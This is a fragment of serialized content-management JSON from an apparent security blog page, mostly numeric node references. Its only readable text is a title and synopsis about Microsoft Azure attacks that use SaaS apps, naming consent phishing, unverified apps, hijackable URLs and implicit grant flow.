"nodeType":165},{},[328356],{"data":328357,"content":328358,"nodeType":178},{},[328359],{"data":328360,"marks":328361,"value":328362,"nodeType":173},{},[],"Common ways an app or integration could lead to compromise in Microsoft Azure: consent phishing, unverified apps, hijackable URLs & implicit grant flow. ","Microsoft Azure attacks: Use SaaS apps to compromise an org ",{"items":328365},[328366,328368],{"sys":328367,"name":505},{"id":504},{"sys":328369,"name":509},{"id":508},{"items":328371},[328372,328533],{"__typename":1528,"sys":328373,"content":328374,"title":271616,"synopsis":271617,"hashTags":118,"publishedDate":271618,"slug":271619,"tagsCollection":328523,"authorsCollection":328529},{"id":269414},{"json":328375},{"nodeType":165,"data":328376,"content":328377},{},[328378,328384,328390,328395,328408,328413,328419,328425,328449,328454,328469,328484,328499],{"nodeType":178,"data":328379,"content":328380},{},[328381],{"nodeType":173,"value":271448,"marks":328382,"data":328383},[],{},{"nodeType":178,"data":328385,"content":328386},{},[328387],{"nodeType":173,"value":271455,"marks":328388,"data":328389},[],{},{"nodeType":312,"data":328391,"content":328394},{"target":328392},{"sys":328393},{"id":271462,"type":317,"linkType":318},[],{"nodeType":178,"data":328396,"content":328397},{},[328398,328401,328405],{"nodeType":173,"value":271468,"marks":328399,"data":328400},[],{},{"nodeType":173,"value":271472,"marks":328402,"data":328404},[328403],{"type":370},{},{"nodeType":173,"value":271477,"marks":328406,"data":328407},[],{},{"nodeType":312,"data":328409,"content":328412},{"target":328410},{"sys":328411},{"id":271484,"type":317,"linkType":318},[],{"nodeType":178,"data":328414,"content":328415},{},[328416],{"nodeType":173,"value":271490,"marks":328417,"data":328418},[],{},{"nodeType":178,"data":328420,"content":328421},{},[328422],{"nodeType":173,"value":271497,"marks":328423,"data":328424},[],{},{"nodeType":178,"data":328426,"content":328427},{},[328428,328431,328437,328440,328446],{"nodeType":173,"value":271504,"marks":328429,"data":328430},[],{},{"nodeType":186,"data":328432,"content":328433},{"uri":271509},[328434],{"nodeType":173,"value":211147,"marks":328435,"data":328436},[],{},{"nodeType":173,"value":933,"marks":328438,"data":328439},[],{},{"nodeType":186,"data":328441,"content":328442},{"uri":271519},[328443],{"nodeType":173,"value":211157,"marks":328444,"data":328445},[],{},{"nodeType":173,"value":1477,"marks":328447,"data":328448},[],{},{"nodeType":312,"data":328450,"content":328453},{"target":328451},{"sys":328452},{"id":271531,"type":317,"linkType":318},[],{"nodeType":178,"data":328455,"content":328456},{},[328457,328460,328466],{"nodeType":173,"value":271537,"marks":328458,"data":328459},[],{},{"nodeType":186,"data":328461,"content":328462},{"uri":271542},[328463],{"nodeType":173,"value":271545,"marks":328464,"data":328465},[],{},{"nodeType":173,"value":271549,"marks":328467,"data":328468},[],{},{"nodeType":178,"data":328470,"content":328471},{},[328472,328475,328481],{"nodeType":173,"value":271556,"marks":328473,"data":328474},[],{},{"nodeType":186,"data":328476,"content":328477},{"uri":271561},[328478],{"nodeType":173,"value":148689,"marks":328479,"data":328480},[],{},{"nodeType":173,"value":271567,"marks":328482,"data":328483},[],{},{"nodeType":178,"data":328485,"content":328486},{},[328487,328490,328496],{"nodeType":173,"value":271574,"marks":328488,"data":328489},[],{},{"nodeType":186,"data":328491,"content":328492},{"uri":271579},[328493],{"nodeType":173,"value":271582,"marks":328494,"data":328495},[],{},{"nodeType":173,"value":271586,"marks":328497,"data":328498},[],{},{"nodeType":178,"data":328500,"content":328501},{},[328502,328505,328511,328514,328520],{"nodeType":173,"value":271593,"marks":328503,"data":328504},[],{},{"nodeType":186,"data":328506,"content":328507},{"uri":117883},[328508],{"nodeType":173,"value":271600,"marks":328509,"data":328510},[],{},{"nodeType":173,"value":2936,"marks":328512,"data":328513},[],{},{"nodeType":186,"data":328515,"content":328516},{"uri":117869},[328517],{"nodeType":173,"value":117876,"marks":328518,"data":328519},[],{},{"nodeType":173,"value":271613,"marks":328521,"data":328522},[],{},{"items":328524},[328525,328527],{"sys":328526,"name":505},{"id":504},{"sys":328528,"name":509},{"id":508},{"items":328530},[328531],{"fullName":271629,"firstName":71176,"jobTitle":271630,"profilePicture":328532},{"url":271632},{"__typename":1528,"sys":328534,"content":328535,"title":288168,"synopsis":318418,"hashTags":118,"publishedDate":318419,"slug":288169,"tagsCollection":328939,"authorsCollection":328945},{"id":274110},{"json":328536},{"data":328537,"content":328538,"nodeType":165},{},[328539,328546,328553,328571,328578,328596,328602,328607,328613,328619,328625,328631,328637,328643,328649,328655,328661,328666,328672,328678,328684,328690,328706,328711,328717,328722,328728,328733,328739,328745,328751,328790,328796,328812,328818,328900,328916,328922,328928,328933],{"data":328540,"content":328541,"nodeType":178},{},[328542],{"data":328543,"marks":328544,"value":317965,"nodeType":173},{},[328545],{"type":1646},{"data":328547,"content":328548,"nodeType":178},{},[328549],{"data":328550,"marks":328551,"value":317973,"nodeType":173},{},[328552],{"type":1646},{"data":328554,"content":328555,"nodeType":178},{},[328556,328559,328568],{"data":328557,"marks":328558,"value":317980,"nodeType":173},{},[],{"data":328560,"content":328563,"nodeType":1698},{"target":328561},{"sys":328562},{"id":317985,"type":317,"linkType":318},[328564],{"data":328565,"marks":328566,"value":317991,"nodeType":173},{},[328567],{"type":194},{"data":328569,"marks":328570,"value":317995,"nodeType":173},{},[],{"data":328572,"content":328573,"nodeType":178},{},[328574],{"data":328575,"marks":328576,"value":318003,"nodeType":173},{},[328577],{"type":1646},{"data":328579,"content":328580,"nodeType":178},{},[328581,328584,328593],{"data":328582,"marks":328583,"value":318010,"nodeType":173},{},[],{"data":328585,"content":328588,"nodeType":1698},{"target":328586},{"sys":328587},{"id":269414,"type":317,"linkType":318},[328589],{"data":328590,"marks":328591,"value":318020,"nodeType":173},{},[328592],{"type":194},{"data":328594,"marks":328595,"value":318024,"nodeType":173},{},[],{"data":328597,"content":328598,"nodeType":178},{},[328599],{"data":328600,"marks":328601,"value":318031,"nodeType":173},{},[],{"data":328603,"content":328606,"nodeType":312},{"target":328604},{"sys":328605},{"id":318036,"type":317,"linkType":318},[],{"data":328608,"content":328609,"nodeType":178},{},[328610],{"data":328611,"marks":328612,"value":318044,"nodeType":173},{},[],{"data":328614,"content":328615,"nodeType":235},{},[328616],{"data":328617,"marks":328618,"value":318051,"nodeType":173},{},[],{"data":328620,"content":328621,"nodeType":178},{},[328622],{"data":328623,"marks":328624,"value":318058,"nodeType":173},{},[],{"data":328626,"content":328627,"nodeType":178},{},[328628],{"data":328629,"marks":328630,"value":318065,"nodeType":173},{},[],{"data":328632,"content":328633,"nodeType":235},{},[328634],{"data":328635,"marks":328636,"value":318072,"nodeType":173},{},[],{"data":328638,"content":328639,"nodeType":178},{},[328640],{"data":328641,"marks":328642,"value":318079,"nodeType":173},{},[],{"data":328644,"content":328645,"nodeType":178},{},[328646],{"data":328647,"marks":328648,"value":318086,"nodeType":173},{},[],{"data":328650,"content":328651,"nodeType":178},{},[328652],{"data":328653,"marks":328654,"value":318093,"nodeType":173},{},[],{"data":328656,"content":328657,"nodeType":178},{},[328658],{"data":328659,"marks":328660,"value":318100,"nodeType":173},{},[],{"data":328662,"content":328665,"nodeType":312},{"target":328663},{"sys":328664},{"id":318105,"type":317,"linkType":318},[],{"data":328667,"content":328668,"nodeType":178},{},[328669],{"data":328670,"marks":328671,"value":318113,"nodeType":173},{},[],{"data":328673,"content":328674,"nodeType":235},{},[328675],{"data":328676,"marks":328677,"value":318120,"nodeType":173},{},[],{"data":328679,"content":328680,"nodeType":178},{},[328681],{"data":328682,"marks":328683,"value":318127,"nodeType":173},{},[],{"data":328685,"content":328686,"nodeType":178},{},[328687],{"data":328688,"marks":328689,"value":318134,"nodeType":173},{},[],{"data":328691,"content":328692,"nodeType":178},{},[328693,328696,328703],{"data":328694,"marks":328695,"value":318141,"nodeType":173},{},[],{"data":328697,"content":328698,"nodeType":186},{"uri":270424},[328699],{"data":328700,"marks":328701,"value":270427,"nodeType":173},{},[328702],{"type":194},{"data":328704,"marks":328705,"value":318152,"nodeType":173},{},[],{"data":328707,"content":328710,"nodeType":312},{"target":328708},{"sys":328709},{"id":318157,"type":317,"linkType":318},[],{"data":328712,"content":328713,"nodeType":178},{},[328714],{"data":328715,"marks":328716,"value":318165,"nodeType":173},{},[],{"data":328718,"content":328721,"nodeType":312},{"target":328719},{"sys":328720},{"id":318170,"type":317,"linkType":318},[],{"data":328723,"content":328724,"nodeType":178},{},[328725],{"data":328726,"marks":328727,"value":318178,"nodeType":173},{},[],{"data":328729,"content":328732,"nodeType":312},{"target":328730},{"sys":328731},{"id":318183,"type":317,"linkType":318},[],{"data":328734,"content":328735,"nodeType":235},{},[328736],{"data":328737,"marks":328738,"value":318191,"nodeType":173},{},[],{"data":328740,"content":328741,"nodeType":178},{},[328742],{"data":328743,"marks":328744,"value":318198,"nodeType":173},{},[],{"data":328746,"content":328747,"nodeType":178},{},[328748],{"data":328749,"marks":328750,"value":318205,"nodeType":173},{},[],{"data":328752,"content":328753,"nodeType":250},{},[328754,328763,328772,328781],{"data":328755,"content":328756,"nodeType":254},{},[328757],{"data":328758,"content":328759,"nodeType":178},{},[328760],{"data":328761,"marks":328762,"value":318218,"nodeType":173},{},[],{"data":328764,"content":328765,"nodeType":254},{},[328766],{"data":328767,"content":328768,"nodeType":178},{},[328769],{"data":328770,"marks":328771,"value":318228,"nodeType":173},{},[],{"data":328773,"content":328774,"nodeType":254},{},[328775],{"data":328776,"content":328777,"nodeType":178},{},[328778],{"data":328779,"marks":328780,"value":318238,"nodeType":173},{},[],{"data":328782,"content":328783,"nodeType":254},{},[328784],{"data":328785,"content":328786,"nodeType":178},{},[328787],{"data":328788,"marks":328789,"value":318248,"nodeType":173},{},[],{"data":328791,"content":328792,"nodeType":178},{},[328793],{"data":328794,"marks":328795,"value":318255,"nodeType":173},{},[],{"data":328797,"content":328798,"nodeType":178},{},[328799,328802,328809],{"data":328800,"marks":328801,"value":318262,"nodeType":173},{},[],{"data":328803,"content":328804,"nodeType":186},{"uri":318265},[328805],{"data":328806,"marks":328807,"value":318271,"nodeType":173},{},[328808],{"type":194},{"data":328810,"marks":328811,"value":318275,"nodeType":173},{},[],{"data":328813,"content":328814,"nodeType":178},{},[328815],{"data":328816,"marks":328817,"value":318282,"nodeType":173},{},[],{"data":328819,"content":328820,"nodeType":250},{},[328821,328830,328839,328848,328867,328882,328891],{"data":328822,"content":328823,"nodeType":254},{},[328824],{"data":328825,"content":328826,"nodeType":178},{},[328827],{"data":328828,"marks":328829,"value":318295,"nodeType":173},{},[],{"data":328831,"content":328832,"nodeType":254},{},[328833],{"data":328834,"content":328835,"nodeType":178},{},[328836],{"data":328837,"marks":328838,"value":318305,"nodeType":173},{},[],{"data":328840,"content":328841,"nodeType":254},{},[328842],{"data":328843,"content":328844,"nodeType":178},{},[328845],{"data":328846,"marks":328847,"value":318315,"nodeType":173},{},[],{"data":328849,"content":328850,"nodeType":254},{},[328851],{"data":328852,"content":328853,"nodeType":178},{},[328854,328857,328864],{"data":328855,"marks":328856,"value":37,"nodeType":173},{},[],{"data":328858,"content":328859,"nodeType":186},{"uri":318327},[328860],{"data":328861,"marks":328862,"value":318333,"nodeType":173},{},[328863],{"type":194},{"data":328865,"marks":328866,"value":37,"nodeType":173},{},[],{"data":328868,"content":328869,"nodeType":254},{},[328870],{"data":328871,"content":328872,"nodeType":250},{},[328873],{"data":328874,"content":328875,"nodeType":254},{},[328876],{"data":328877,"content":328878,"nodeType":178},{},[328879],{"data":328880,"marks":328881,"value":318352,"nodeType":173},{},[],{"data":328883,"content":328884,"nodeType":254},{},[328885],{"data":328886,"content":328887,"nodeType":178},{},[328888],{"data":328889,"marks":328890,"value":318362,"nodeType":173},{},[],{"data":328892,"content":328893,"nodeType":254},{},[328894],{"data":328895,"content":328896,"nodeType":178},{},[328897],{"data":328898,"marks":328899,"value":318372,"nodeType":173},{},[],{"data":328901,"content":328902,"nodeType":178},{},[328903,328906,328913],{"data":328904,"marks":328905,"value":318379,"nodeType":173},{},[],{"data":328907,"content":328908,"nodeType":186},{"uri":318382},[328909],{"data":328910,"marks":328911,"value":318388,"nodeType":173},{},[328912],{"type":194},{"data":328914,"marks":328915,"value":318392,"nodeType":173},{},[],{"data":328917,"content":328918,"nodeType":235},{},[328919],{"data":328920,"marks":328921,"value":40632,"nodeType":173},{},[],{"data":328923,"content":328924,"nodeType":178},{},[328925],{"data":328926,"marks":328927,"value":318405,"nodeType":173},{},[],{"data":328929,"content":328932,"nodeType":312},{"target":328930},{"sys":328931},{"id":318410,"type":317,"linkType":318},[],{"data":328934,"content":328935,"nodeType":178},{},[328936],{"data":328937,"marks":328938,"value":37,"nodeType":173},{},[],{"items":328940},[328941,328943],{"sys":328942,"name":509},{"id":508},{"sys":328944,"name":26137},{"id":26136},{"items":328946},[328947],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":328948},{"url":155985},{"items":328950},[328951],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":328952},{"url":155985},{"json":328954,"links":330081},{"nodeType":165,"data":328955,"content":328956},{},[328957,328963,328969,328975,328981,328999,329005,329010,329016,329022,329028,329056,329061,329067,329175,329181,329187,329421,329427,329433,329439,329465,329471,329477,329482,329488,329493,329499,329505,329511,329517,329523,329529,329535,329541,329546,329552,329565,329571,329577,329603,329609,329625,329631,329637,329643,329649,329680,329696,329744,329750,329756,329772,329788,329794,329820,329826,329832,329838,329844,329850,329856,329862,329878,329883,329889,329904,329910,329916,329921,329927,329933,329938,329944,329980,329986,329991,329997,330002,330008,330014,330040,330046,330052,330058,330064,330070,330075],{"nodeType":178,"data":328958,"content":328959},{},[328960],{"nodeType":173,"value":269380,"marks":328961,"data":328962},[],{},{"nodeType":178,"data":328964,"content":328965},{},[328966],{"nodeType":173,"value":269387,"marks":328967,"data":328968},[],{},{"nodeType":169,"data":328970,"content":328971},{},[328972],{"nodeType":173,"value":39940,"marks":328973,"data":328974},[],{},{"nodeType":235,"data":328976,"content":328977},{},[328978],{"nodeType":173,"value":269400,"marks":328979,"data":328980},[],{},{"nodeType":178,"data":328982,"content":328983},{},[328984,328987,328996],{"nodeType":173,"value":269407,"marks":328985,"data":328986},[],{},{"nodeType":1698,"data":328988,"content":328991},{"target":328989},{"sys":328990},{"id":269414,"type":317,"linkType":318},[328992],{"nodeType":173,"value":269417,"marks":328993,"data":328995},[328994],{"type":194},{},{"nodeType":173,"value":269422,"marks":328997,"data":328998},[],{},{"nodeType":178,"data":329000,"content":329001},{},[329002],{"nodeType":173,"value":269429,"marks":329003,"data":329004},[],{},{"nodeType":312,"data":329006,"content":329009},{"target":329007},{"sys":329008},{"id":269436,"type":317,"linkType":318},[],{"nodeType":235,"data":329011,"content":329012},{},[329013],{"nodeType":173,"value":269442,"marks":329014,"data":329015},[],{},{"nodeType":178,"data":329017,"content":329018},{},[329019],{"nodeType":173,"value":269449,"marks":329020,"data":329021},[],{},{"nodeType":178,"data":329023,"content":329024},{},[329025],{"nodeType":173,"value":269456,"marks":329026,"data":329027},[],{},{"nodeType":178,"data":329029,"content":329030},{},[329031,329034,329041,329044,329053],{"nodeType":173,"value":269463,"marks":329032,"data":329033},[],{},{"nodeType":186,"data":329035,"content":329036},{"uri":269468},[329037],{"nodeType":173,"value":269471,"marks":329038,"data":329040},[329039],{"type":194},{},{"nodeType":173,"value":269476,"marks":329042,"data":329043},[],{},{"nodeType":1698,"data":329045,"content":329048},{"target":329046},{"sys":329047},{"id":269483,"type":317,"linkType":318},[329049],{"nodeType":173,"value":269486,"marks":329050,"data":329052},[329051],{"type":194},{},{"nodeType":173,"value":269491,"marks":329054,"data":329055},[],{},{"nodeType":312,"data":329057,"content":329060},{"target":329058},{"sys":329059},{"id":269498,"type":317,"linkType":318},[],{"nodeType":178,"data":329062,"content":329063},{},[329064],{"nodeType":173,"value":269504,"marks":329065,"data":329066},[],{},{"nodeType":1653,"data":329068,"content":329069},{},[329070,329091,329112,329133,329154],{"nodeType":1657,"data":329071,"content":329072},{},[329073,329082],{"nodeType":1687,"data":329074,"content":329075},{},[329076],{"nodeType":178,"data":329077,"content":329078},{},[329079],{"nodeType":173,"value":269520,"marks":329080,"data":329081},[],{},{"nodeType":1687,"data":329083,"content":329084},{},[329085],{"nodeType":178,"data":329086,"content":329087},{},[329088],{"nodeType":173,"value":269530,"marks":329089,"data":329090},[],{},{"nodeType":1657,"data":329092,"content":329093},{},[329094,329103],{"nodeType":1687,"data":329095,"content":329096},{},[329097],{"nodeType":178,"data":329098,"content":329099},{},[329100],{"nodeType":173,"value":269543,"marks":329101,"data":329102},[],{},{"nodeType":1687,"data":329104,"content":329105},{},[329106],{"nodeType":178,"data":329107,"content":329108},{},[329109],{"nodeType":173,"value":269553,"marks":329110,"data":329111},[],{},{"nodeType":1657,"data":329113,"content":329114},{},[329115,329124],{"nodeType":1687,"data":329116,"content":329117},{},[329118],{"nodeType":178,"data":329119,"content":329120},{},[329121],{"nodeType":173,"value":269566,"marks":329122,"data":329123},[],{},{"nodeType":1687,"data":329125,"content":329126},{},[329127],{"nodeType":178,"data":329128,"content":329129},{},[329130],{"nodeType":173,"value":269576,"marks":329131,"data":329132},[],{},{"nodeType":1657,"data":329134,"content":329135},{},[329136,329145],{"nodeType":1687,"data":329137,"content":329138},{},[329139],{"nodeType":178,"data":329140,"content":329141},{},[329142],{"nodeType":173,"value":269589,"marks":329143,"data":329144},[],{},{"nodeType":1687,"data":329146,"content":329147},{},[329148],{"nodeType":178,"data":329149,"content":329150},{},[329151],{"nodeType":173,"value":269599,"marks":329152,"data":329153},[],{},{"nodeType":1657,"data":329155,"content":329156},{},[329157,329166],{"nodeType":1687,"data":329158,"content":329159},{},[329160],{"nodeType":178,"data":329161,"content":329162},{},[329163],{"nodeType":173,"value":269612,"marks":329164,"data":329165},[],{},{"nodeType":1687,"data":329167,"content":329168},{},[329169],{"nodeType":178,"data":329170,"content":329171},{},[329172],{"nodeType":173,"value":269622,"marks":329173,"data":329174},[],{},{"nodeType":178,"data":329176,"content":329177},{},[329178],{"nodeType":173,"value":269629,"marks":329179,"data":329180},[],{},{"nodeType":178,"data":329182,"content":329183},{},[329184],{"nodeType":173,"value":269636,"marks":329185,"data":329186},[],{},{"nodeType":1653,"data":329188,"content":329189},{},[329190,329211,329232,329253,329274,329295,329316,329337,329358,329379,329400],{"nodeType":1657,"data":329191,"content":329192},{},[329193,329202],{"nodeType":1687,"data":329194,"content":329195},{},[329196],{"nodeType":178,"data":329197,"content":329198},{},[329199],{"nodeType":173,"value":269652,"marks":329200,"data":329201},[],{},{"nodeType":1687,"data":329203,"content":329204},{},[329205],{"nodeType":178,"data":329206,"content":329207},{},[329208],{"nodeType":173,"value":269662,"marks":329209,"data":329210},[],{},{"nodeType":1657,"data":329212,"content":329213},{},[329214,329223],{"nodeType":1687,"data":329215,"content":329216},{},[329217],{"nodeType":178,"data":329218,"content":329219},{},[329220],{"nodeType":173,"value":269675,"marks":329221,"data":329222},[],{},{"nodeType":1687,"data":329224,"content":329225},{},[329226],{"nodeType":178,"data":329227,"content":329228},{},[329229],{"nodeType":173,"value":269685,"marks":329230,"data":329231},[],{},{"nodeType":1657,"data":329233,"content":329234},{},[329235,329244],{"nodeType":1687,"data":329236,"content":329237},{},[329238],{"nodeType":178,"data":329239,"content":329240},{},[329241],{"nodeType":173,"value":269698,"marks":329242,"data":329243},[],{},{"nodeType":1687,"data":329245,"content":329246},{},[329247],{"nodeType":178,"data":329248,"content":329249},{},[329250],{"nodeType":173,"value":269708,"marks":329251,"data":329252},[],{},{"nodeType":1657,"data":329254,"content":329255},{},[329256,329265],{"nodeType":1687,"data":329257,"content":329258},{},[329259],{"nodeType":178,"data":329260,"content":329261},{},[329262],{"nodeType":173,"value":269721,"marks":329263,"data":329264},[],{},{"nodeType":1687,"data":329266,"content":329267},{},[329268],{"nodeType":178,"data":329269,"content":329270},{},[329271],{"nodeType":173,"value":269731,"marks":329272,"data":329273},[],{},{"nodeType":1657,"data":329275,"content":329276},{},[329277,329286],{"nodeType":1687,"data":329278,"content":329279},{},[329280],{"nodeType":178,"data":329281,"content":329282},{},[329283],{"nodeType":173,"value":269744,"marks":329284,"data":329285},[],{},{"nodeType":1687,"data":329287,"content":329288},{},[329289],{"nodeType":178,"data":329290,"content":329291},{},[329292],{"nodeType":173,"value":269754,"marks":329293,"data":329294},[],{},{"nodeType":1657,"data":329296,"content":329297},{},[329298,329307],{"nodeType":1687,"data":329299,"content":329300},{},[329301],{"nodeType":178,"data":329302,"content":329303},{},[329304],{"nodeType":173,"value":269767,"marks":329305,"data":329306},[],{},{"nodeType":1687,"data":329308,"content":329309},{},[329310],{"nodeType":178,"data":329311,"content":329312},{},[329313],{"nodeType":173,"value":269777,"marks":329314,"data":329315},[],{},{"nodeType":1657,"data":329317,"content":329318},{},[329319,329328],{"nodeType":1687,"data":329320,"content":329321},{},[329322],{"nodeType":178,"data":329323,"content":329324},{},[329325],{"nodeType":173,"value":269790,"marks":329326,"data":329327},[],{},{"nodeType":1687,"data":329329,"content":329330},{},[329331],{"nodeType":178,"data":329332,"content":329333},{},[329334],{"nodeType":173,"value":269800,"marks":329335,"data":329336},[],{},{"nodeType":1657,"data":329338,"content":329339},{},[329340,329349],{"nodeType":1687,"data":329341,"content":329342},{},[329343],{"nodeType":178,"data":329344,"content":329345},{},[329346],{"nodeType":173,"value":269813,"marks":329347,"data":329348},[],{},{"nodeType":1687,"data":329350,"content":329351},{},[329352],{"nodeType":178,"data":329353,"content":329354},{},[329355],{"nodeType":173,"value":269823,"marks":329356,"data":329357},[],{},{"nodeType":1657,"data":329359,"content":329360},{},[329361,329370],{"nodeType":1687,"data":329362,"content":329363},{},[329364],{"nodeType":178,"data":329365,"content":329366},{},[329367],{"nodeType":173,"value":269836,"marks":329368,"data":329369},[],{},{"nodeType":1687,"data":329371,"content":329372},{},[329373],{"nodeType":178,"data":329374,"content":329375},{},[329376],{"nodeType":173,"value":269846,"marks":329377,"data":329378},[],{},{"nodeType":1657,"data":329380,"content":329381},{},[329382,329391],{"nodeType":1687,"data":329383,"content":329384},{},[329385],{"nodeType":178,"data":329386,"content":329387},{},[329388],{"nodeType":173,"value":269859,"marks":329389,"data":329390},[],{},{"nodeType":1687,"data":329392,"content":329393},{},[329394],{"nodeType":178,"data":329395,"content":329396},{},[329397],{"nodeType":173,"value":269869,"marks":329398,"data":329399},[],{},{"nodeType":1657,"data":329401,"content":329402},{},[329403,329412],{"nodeType":1687,"data":329404,"content":329405},{},[329406],{"nodeType":178,"data":329407,"content":329408},{},[329409],{"nodeType":173,"value":269882,"marks":329410,"data":329411},[],{},{"nodeType":1687,"data":329413,"content":329414},{},[329415],{"nodeType":178,"data":329416,"content":329417},{},[329418],{"nodeType":173,"value":269892,"marks":329419,"data":329420},[],{},{"nodeType":178,"data":329422,"content":329423},{},[329424],{"nodeType":173,"value":269899,"marks":329425,"data":329426},[],{},{"nodeType":169,"data":329428,"content":329429},{},[329430],{"nodeType":173,"value":269906,"marks":329431,"data":329432},[],{},{"nodeType":235,"data":329434,"content":329435},{},[329436],{"nodeType":173,"value":269400,"marks":329437,"data":329438},[],{},{"nodeType":178,"data":329440,"content":329441},{},[329442,329445,329452,329455,329462],{"nodeType":173,"value":269919,"marks":329443,"data":329444},[],{},{"nodeType":186,"data":329446,"content":329447},{"uri":269924},[329448],{"nodeType":173,"value":269927,"marks":329449,"data":329451},[329450],{"type":194},{},{"nodeType":173,"value":269932,"marks":329453,"data":329454},[],{},{"nodeType":186,"data":329456,"content":329457},{"uri":269937},[329458],{"nodeType":173,"value":269940,"marks":329459,"data":329461},[329460],{"type":194},{},{"nodeType":173,"value":269945,"marks":329463,"data":329464},[],{},{"nodeType":178,"data":329466,"content":329467},{},[329468],{"nodeType":173,"value":269952,"marks":329469,"data":329470},[],{},{"nodeType":178,"data":329472,"content":329473},{},[329474],{"nodeType":173,"value":269959,"marks":329475,"data":329476},[],{},{"nodeType":312,"data":329478,"content":329481},{"target":329479},{"sys":329480},{"id":269966,"type":317,"linkType":318},[],{"nodeType":178,"data":329483,"content":329484},{},[329485],{"nodeType":173,"value":269972,"marks":329486,"data":329487},[],{},{"nodeType":312,"data":329489,"content":329492},{"target":329490},{"sys":329491},{"id":269979,"type":317,"linkType":318},[],{"nodeType":178,"data":329494,"content":329495},{},[329496],{"nodeType":173,"value":269985,"marks":329497,"data":329498},[],{},{"nodeType":178,"data":329500,"content":329501},{},[329502],{"nodeType":173,"value":269992,"marks":329503,"data":329504},[],{},{"nodeType":235,"data":329506,"content":329507},{},[329508],{"nodeType":173,"value":269442,"marks":329509,"data":329510},[],{},{"nodeType":178,"data":329512,"content":329513},{},[329514],{"nodeType":173,"value":270005,"marks":329515,"data":329516},[],{},{"nodeType":169,"data":329518,"content":329519},{},[329520],{"nodeType":173,"value":270012,"marks":329521,"data":329522},[],{},{"nodeType":235,"data":329524,"content":329525},{},[329526],{"nodeType":173,"value":269400,"marks":329527,"data":329528},[],{},{"nodeType":178,"data":329530,"content":329531},{},[329532],{"nodeType":173,"value":270025,"marks":329533,"data":329534},[],{},{"nodeType":178,"data":329536,"content":329537},{},[329538],{"nodeType":173,"value":270032,"marks":329539,"data":329540},[],{},{"nodeType":312,"data":329542,"content":329545},{"target":329543},{"sys":329544},{"id":270039,"type":317,"linkType":318},[],{"nodeType":178,"data":329547,"content":329548},{},[329549],{"nodeType":173,"value":270045,"marks":329550,"data":329551},[],{},{"nodeType":178,"data":329553,"content":329554},{},[329555,329558,329562],{"nodeType":173,"value":270052,"marks":329556,"data":329557},[],{},{"nodeType":173,"value":270056,"marks":329559,"data":329561},[329560],{"type":1646},{},{"nodeType":173,"value":270061,"marks":329563,"data":329564},[],{},{"nodeType":235,"data":329566,"content":329567},{},[329568],{"nodeType":173,"value":269442,"marks":329569,"data":329570},[],{},{"nodeType":178,"data":329572,"content":329573},{},[329574],{"nodeType":173,"value":270074,"marks":329575,"data":329576},[],{},{"nodeType":178,"data":329578,"content":329579},{},[329580,329583,329590,329593,329600],{"nodeType":173,"value":270081,"marks":329581,"data":329582},[],{},{"nodeType":186,"data":329584,"content":329585},{"uri":270086},[329586],{"nodeType":173,"value":148689,"marks":329587,"data":329589},[329588],{"type":194},{},{"nodeType":173,"value":270093,"marks":329591,"data":329592},[],{},{"nodeType":186,"data":329594,"content":329595},{"uri":270098},[329596],{"nodeType":173,"value":270101,"marks":329597,"data":329599},[329598],{"type":194},{},{"nodeType":173,"value":270106,"marks":329601,"data":329602},[],{},{"nodeType":178,"data":329604,"content":329605},{},[329606],{"nodeType":173,"value":270113,"marks":329607,"data":329608},[],{},{"nodeType":178,"data":329610,"content":329611},{},[329612,329615,329622],{"nodeType":173,"value":270120,"marks":329613,"data":329614},[],{},{"nodeType":186,"data":329616,"content":329617},{"uri":270125},[329618],{"nodeType":173,"value":270128,"marks":329619,"data":329621},[329620],{"type":194},{},{"nodeType":173,"value":270133,"marks":329623,"data":329624},[],{},{"nodeType":178,"data":329626,"content":329627},{},[329628],{"nodeType":173,"value":270140,"marks":329629,"data":329630},[],{},{"nodeType":178,"data":329632,"content":329633},{},[329634],{"nodeType":173,"value":270147,"marks":329635,"data":329636},[],{},{"nodeType":169,"data":329638,"content":329639},{},[329640],{"nodeType":173,"value":270154,"marks":329641,"data":329642},[],{},{"nodeType":235,"data":329644,"content":329645},{},[329646],{"nodeType":173,"value":269400,"marks":329647,"data":329648},[],{},{"nodeType":178,"data":329650,"content":329651},{},[329652,329656,329664,329668,329676],{"nodeType":173,"value":270167,"marks":329653,"data":329655},[329654],{"type":1646},{},{"nodeType":186,"data":329657,"content":329658},{"uri":270173},[329659],{"nodeType":173,"value":270176,"marks":329660,"data":329663},[329661,329662],{"type":194},{"type":1646},{},{"nodeType":173,"value":270182,"marks":329665,"data":329667},[329666],{"type":1646},{},{"nodeType":186,"data":329669,"content":329670},{"uri":270188},[329671],{"nodeType":173,"value":270191,"marks":329672,"data":329675},[329673,329674],{"type":194},{"type":1646},{},{"nodeType":173,"value":270197,"marks":329677,"data":329679},[329678],{"type":1646},{},{"nodeType":178,"data":329681,"content":329682},{},[329683,329686,329693],{"nodeType":173,"value":270205,"marks":329684,"data":329685},[],{},{"nodeType":186,"data":329687,"content":329688},{"uri":270210},[329689],{"nodeType":173,"value":270213,"marks":329690,"data":329692},[329691],{"type":194},{},{"nodeType":173,"value":270218,"marks":329694,"data":329695},[],{},{"nodeType":246189,"data":329697,"content":329698},{},[329699,329708,329717,329726,329735],{"nodeType":254,"data":329700,"content":329701},{},[329702],{"nodeType":178,"data":329703,"content":329704},{},[329705],{"nodeType":173,"value":270231,"marks":329706,"data":329707},[],{},{"nodeType":254,"data":329709,"content":329710},{},[329711],{"nodeType":178,"data":329712,"content":329713},{},[329714],{"nodeType":173,"value":270241,"marks":329715,"data":329716},[],{},{"nodeType":254,"data":329718,"content":329719},{},[329720],{"nodeType":178,"data":329721,"content":329722},{},[329723],{"nodeType":173,"value":270251,"marks":329724,"data":329725},[],{},{"nodeType":254,"data":329727,"content":329728},{},[329729],{"nodeType":178,"data":329730,"content":329731},{},[329732],{"nodeType":173,"value":270261,"marks":329733,"data":329734},[],{},{"nodeType":254,"data":329736,"content":329737},{},[329738],{"nodeType":178,"data":329739,"content":329740},{},[329741],{"nodeType":173,"value":270271,"marks":329742,"data":329743},[],{},{"nodeType":178,"data":329745,"content":329746},{},[329747],{"nodeType":173,"value":270278,"marks":329748,"data":329749},[],{},{"nodeType":178,"data":329751,"content":329752},{},[329753],{"nodeType":173,"value":270285,"marks":329754,"data":329755},[],{},{"nodeType":178,"data":329757,"content":329758},{},[329759,329762,329769],{"nodeType":173,"value":270292,"marks":329760,"data":329761},[],{},{"nodeType":186,"data":329763,"content":329764},{"uri":270297},[329765],{"nodeType":173,"value":270300,"marks